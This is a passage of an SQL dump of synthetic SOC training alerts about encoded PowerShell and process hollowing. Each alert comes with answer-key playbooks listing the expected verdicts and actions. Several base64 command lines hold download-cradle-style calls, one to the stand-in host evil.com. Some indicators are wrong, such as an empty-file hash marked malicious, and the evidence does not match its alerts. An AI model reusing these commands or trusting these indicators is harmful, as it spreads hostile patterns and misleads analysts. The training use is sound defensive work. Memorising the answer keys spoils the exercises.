Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command mirrors known attack patterns\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded command and contact with a malicious IP confirm a malware attempt.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.089Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:15:53Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"198.51.100.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"LAPTOP-USER01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.089Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:15:53Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"198.51.100.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"LAPTOP-USER01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.089Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:15:53Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"198.51.100.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"LAPTOP-USER01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.089Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:15:53Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"198.51.100.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"LAPTOP-USER01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand 
Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.089Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:15:53Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"198.51.100.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"LAPTOP-USER01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Z2V0IGNvbnRlbnQgZnJvbSBodHRwOi8vZXZpbC5jb20=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1734, 'False Positive: Benign PowerShell Activity', 'low', 'Carbon Black', 'Detected PowerShell activity with encoded command execution. Further analysis reveals it to be a benign script.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T22:40:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.80\",\"dst_ip\":\"192.168.1.100\",\"username\":\"awilliams\",\"hostname\":\"DESKTOP-USER02\",\"command_line\":\"powershell -EncodedCommand Y2FsYyA3Kjcp\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.80\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing benign PowerShell\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand Y2FsYyA3Kjcp\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded command decoded to a benign script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command, once decoded, is confirmed to be non-malicious.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.091Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:40:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"awilliams\\\",\\\"hostname\\\":\\\"DESKTOP-USER02\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Y2FsYyA3Kjcp\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.091Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:40:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"awilliams\\\",\\\"hostname\\\":\\\"DESKTOP-USER02\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Y2FsYyA3Kjcp\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.091Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:40:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"awilliams\\\",\\\"hostname\\\":\\\"DESKTOP-USER02\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Y2FsYyA3Kjcp\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.091Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:40:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"awilliams\\\",\\\"hostname\\\":\\\"DESKTOP-USER02\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Y2FsYyA3Kjcp\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.091Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:40:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"awilliams\\\",\\\"hostname\\\":\\\"DESKTOP-USER02\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand Y2FsYyA3Kjcp\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 
0),
(1735, 'PowerShell Encoded Script Execution Detected', 'high', 'CrowdStrike', 'A PowerShell download cradle executed an encoded script on an internal machine, indicating a potential compromise.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-15\",\"command_line\":\"powershell.exe -EncodedCommand UwBFAFgAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBlAHgBhABtAHAAbABlAC4AYwBvAG0AIgA=\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UwBFAFgAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBlAHgBhABtAHAAbABlAC4AYwBvAG0AIgA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell script linked to known malware activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address indicating a compromised host\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of an encoded PowerShell script suggests an attempt to bypass security controls.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1736, 'Process Hollowing in Explorer.exe Detected', 'critical', 'SentinelOne', 'Process hollowing detected in explorer.exe, indicating potential malware activity.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:20:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"\",\"username\":\"asmith\",\"hostname\":\"workstation-25\",\"command_line\":\"explorer.exe\",\"file_hash\":\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"explorer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Process hollowing is a known technique for stealthy malware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variants\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised workstation\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing is a covert technique used by malware to inject malicious code into a legitimate process.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"workstation-25\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"workstation-25\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"workstation-25\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"workstation-25\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"workstation-25\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"54a3d6e135b3f4b2b8e5d3458e2a2a1d\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1737, 'Suspicious PowerShell Activity Observed', 'medium', 'Carbon Black', 'PowerShell executed a script with encoded commands, which may indicate malicious intent.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:55:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"\",\"username\":\"mbrown\",\"hostname\":\"workstation-45\",\"command_line\":\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell commands often indicate obfuscation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, further investigation needed\"}}],\"expected_actions\":[\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is indicative of potential evasive techniques.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:55:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"workstation-45\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:55:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"workstation-45\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:55:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"workstation-45\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:55:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"workstation-45\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:55:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"workstation-45\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand RgBoAGEAcwAgAC0ARgBvAHIAbQBhAHQAIAAtAFQAZQB4AHQAIAAnAGUAbgBjAG8AZABlAGQAIABjAG8AbgB0AGUAbgB0ACcA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1738, 'Potential Process Hollowing Detected in Legitimate Process', 'high', 'Sysmon', 'Process hollowing detected in a legitimate process, indicating possible covert malware activity.', 'Malware', 'T1055', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"\",\"username\":\"tjohnson\",\"hostname\":\"workstation-10\",\"command_line\":\"svchost.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Process hollowing detected, svchost.exe used for malicious purposes\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware exploiting process hollowing\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address suggests an internal compromise\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing is used to inject malicious code into legitimate processes, often to avoid detection.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"tjohnson\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"tjohnson\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"tjohnson\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"tjohnson\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"tjohnson\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1739, 'False Positive PowerShell Execution', 'low', 'Carbon Black', 'A PowerShell script executed with encoded commands was flagged, but investigation revealed it was a legitimate administrative task.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:15:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.20\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"admin-workstation\",\"command_line\":\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Confirmed as a legitimate administrative task\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP, confirmed as administrative workstation\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command was part of a routine system maintenance script executed by the IT department.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, 